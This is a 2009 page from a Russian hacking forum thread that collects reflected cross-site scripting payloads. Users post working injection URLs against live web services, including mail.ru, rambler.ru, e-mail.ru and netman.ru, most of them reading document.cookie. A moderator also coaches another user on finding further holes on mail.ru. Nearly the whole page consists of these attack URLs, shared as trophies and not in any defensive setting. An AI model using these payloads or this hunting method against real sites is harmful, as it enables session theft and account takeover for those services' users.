ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
Перезагрузить страницу Пассивные xss на почтовых серверах
   
Ответ
Страница 6 из 15 « Первая < 2 3 4 5 6 7 8 9 10 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

e-mail
  #51  
Старый 15.09.2009, 21:21
Аватар для Travakur555
Travakur555
Новичок
Регистрация: 14.09.2009
Сообщений: 7
Провел на форуме:
126690

Репутация: 0
По умолчанию e-mail
http://e-mail.ru/webmail.ok?ulogin=%22%3E%3Cscript%3Ealert(%27Sin3v %27)%3C/script%3E
 
Ответить с цитированием

  #52  
Старый 16.09.2009, 14:42
Аватар для Sin3v
Sin3v
Участник форума
Регистрация: 16.07.2008
Сообщений: 159
Провел на форуме:
1063538

Репутация: 240
Отправить сообщение для Sin3v с помощью ICQ
По умолчанию
Mail.ru
Цитата:
http://kv.mail.ru/game/create_character.php?name=%22%3E%3Cscript%3Ealert% 28document.cookie%29%3C/script%3E
Работает у авторизованных.
 
Ответить с цитированием

  #53  
Старый 21.09.2009, 21:48
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию
за что вы мои XSS удаляете ?

Я их сам находил...

http://www.netman.ru/contacts.phtml в поле имя и фамилия вводим
<'<"><script>alert('XSS')</script><
Последний раз редактировалось Ruslan1817; 21.09.2009 в 21:59..
 
Ответить с цитированием

  #54  
Старый 23.09.2009, 13:02
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию
http://horoscopes.rambler.ru/astrosystems.html?sid=47670&sign=203672&sec=203657 1"><script>alert(document.cookie)</script>
 
Ответить с цитированием

  #55  
Старый 24.09.2009, 15:39
Аватар для satana-fu
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию
пассивка на рамблере

Цитата:
http://id-planet.rambler.ru/main/user/blacklist
строка Найти забаненного
PHP код:
<img src=foo.png onerror=alert(document.cookie) /> 

еще одна пассивка на рамблер

PHP код:
http://autorambler.ru/cars/by-price/?price_from=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&raz=1&price_to=250000&model=303&skip=0&currency=RUR 
Последний раз редактировалось satana-fu; 21.10.2009 в 18:24..
 
Ответить с цитированием

  #56  
Старый 24.09.2009, 16:57
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию
http://torg.mail.ru/844/res/?&"><script>alert(document.cookie)</script>[sort]=2
 
Ответить с цитированием

  #57  
Старый 24.09.2009, 17:03
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию
http://torg.mail.ru/835/138479/?%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Etab_id=2
 
Ответить с цитированием

  #58  
Старый 24.09.2009, 17:09
Аватар для satana-fu
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию
Цитата:
Сообщение от Ruslan1817  
первый раз сам нашел... на майле... правда с подсказкой :-)
это тоже твой xss, нашел уже с твоей подсказкой

http://torg.mail.ru/109/res/?"><script>alert(document.cookie)</script>[vendor_id][]=49
 
Ответить с цитированием

  #59  
Старый 24.09.2009, 17:30
Аватар для Ruslan1817
Ruslan1817
Постоянный
Регистрация: 17.01.2009
Сообщений: 309
Провел на форуме:
2991228

Репутация: 403
По умолчанию
https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1"><script>alert('Sin3 v')</script>
от Sinva

подправил
https://kvbilling.mail.ru/stat/?date=16-09-2009&tillDate=23-09-2009&showStats=showStats&pn=1%3Cimg%20src=%22%3E%3 Cscript%3Ealert(document.cookie)%3C/script%3E
Последний раз редактировалось Ruslan1817; 24.09.2009 в 23:01..
 
Ответить с цитированием

  #60  
Старый 27.09.2009, 04:37
Аватар для satana-fu
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию
Цитата:
Сообщение от Ruslan1817  
все пассивки прикрыли... как так 0_0
а ты развивай ту. которую начал)))), вот тебе еще пассивка на майл

Цитата:
http://torg.mail.ru/844/res/?%27p3%5Bprice_from%5D=%22%3E%3Cscript%3Ealert%28d ocument.cookie%29%3C%2Fscript%3E
улови какая разница между вышестоящим и этим урл ниже

Цитата:
http://torg.mail.ru/844/res/?p3%5Bprice_from%5D=%22%3E%3Cscript%3Ealert%28docu ment.cookie%29%3C%2Fscript%3E
как только догонишь, найдешь кучу пассивных xss на майле не забудь убрать пробелы
Последний раз редактировалось satana-fu; 21.10.2009 в 15:58..
 
Ответить с цитированием
Ответ
Страница 6 из 15 « Первая < 2 3 4 5 6 7 8 9 10 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Сценарии/CMF/СMS 7 04.02.2010 02:55
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ